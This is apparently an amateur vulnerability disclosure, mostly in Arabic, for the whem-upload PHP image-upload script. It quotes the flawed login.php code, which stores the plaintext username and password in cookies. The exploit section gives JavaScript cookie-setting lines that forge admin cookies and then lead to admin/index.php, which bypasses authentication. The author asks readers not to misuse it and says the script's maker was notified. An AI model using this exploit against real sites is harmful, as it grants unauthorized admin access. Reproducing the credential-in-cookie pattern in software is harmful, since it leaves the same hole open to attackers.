whem-upload Insecure Cookie Handling Vulnerability.

كنت عم دور على سكربت لرفع الصور.

وجدت whem-upload

نزلته و جدت مشكلة فيه و انا عم حلها اكتشفت فيه ثغرة
و هي اول مرة بحياتي بلاقي ثغرة بسكربت

ارجو من الكل ان لا ستخدمها في إيذاء المواقع الاخرى.

انا مالي مسؤول عن اي ضرر بصيب المواقع من جراء كشفي للثغرة.

بعتت رسالة لصاحب السكربت وحيد ومارد الحق عليه إذا صار شي.بتمنى من الكل أنو ما يستخدموها لاختراق المواقع

النقل مسموح مع ذكر المصدر.

////////////////////////////////////////////////////////////////////////////

---------------------------
wehm-up 1.0 I.Cookie Hand.
---------------------------
Author: Adnan ( zizo.h)
Email: a-homssi@scs-net.org
Download: up
---------------------------
Bug In: \login.php

$user = $_POST['user'];
$pass = $_POST['pass'];
if ($user == “$mem_user” and $pass == “$mem_pass”){
setcookie(“mem_user”, “$user”, time() + 1000);
setcookie(“mem_pass”, “$pass”, time() + 1000);

Exploit:
login:
admin/login.php
javascript:document.cookie = "whem_Name=admin; path=/";
javascript:document.cookie = "whem_Password=admin; path=/";

then \admin\index.php # So Easy To Hack  

Greetz:All No_Hack Members,Sniper-Sa;
///////////////////////////////////////////////////////////
لأي استفسار الرجاء مراسلتي.
سلام.